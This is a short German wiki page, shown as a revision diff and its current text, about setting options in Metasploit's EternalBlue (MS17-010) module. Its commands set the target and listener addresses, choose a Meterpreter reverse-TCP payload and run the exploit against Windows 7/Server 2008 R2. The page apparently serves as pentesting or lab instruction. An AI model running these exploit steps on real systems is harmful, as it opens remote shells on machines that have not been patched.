Metasploit options einstellen: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „*msf6 exploit(windows/smb/ms17_010_eternalblue) > options <pre> Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting…“) |
|||
| Zeile 1: | Zeile 1: | ||
| + | =Anzeigen der Optionen= | ||
*msf6 exploit(windows/smb/ms17_010_eternalblue) > options | *msf6 exploit(windows/smb/ms17_010_eternalblue) > options | ||
<pre> | <pre> | ||
| Zeile 29: | Zeile 30: | ||
0 Windows 7 and Server 2008 R2 (x64) All Service Packs | 0 Windows 7 and Server 2008 R2 (x64) All Service Packs | ||
</pre> | </pre> | ||
| + | =RHOSTS= | ||
| + | *msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.12 | ||
| + | RHOSTS => 192.168.0.12 | ||
| + | =PAYLOADS= | ||
| + | *msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads | ||
| + | =LHOSTS= | ||
| + | *msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.11 | ||
| + | LHOST => 192.168.0.11 | ||
| + | =EXPLOIT= | ||
| + | *msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit | ||
Aktuelle Version vom 4. August 2021, 21:42 Uhr
Anzeigen der Optionen
- msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 94.130.248.209 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
RHOSTS
- msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.12
RHOSTS => 192.168.0.12
PAYLOADS
- msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
LHOSTS
- msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
EXPLOIT
- msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit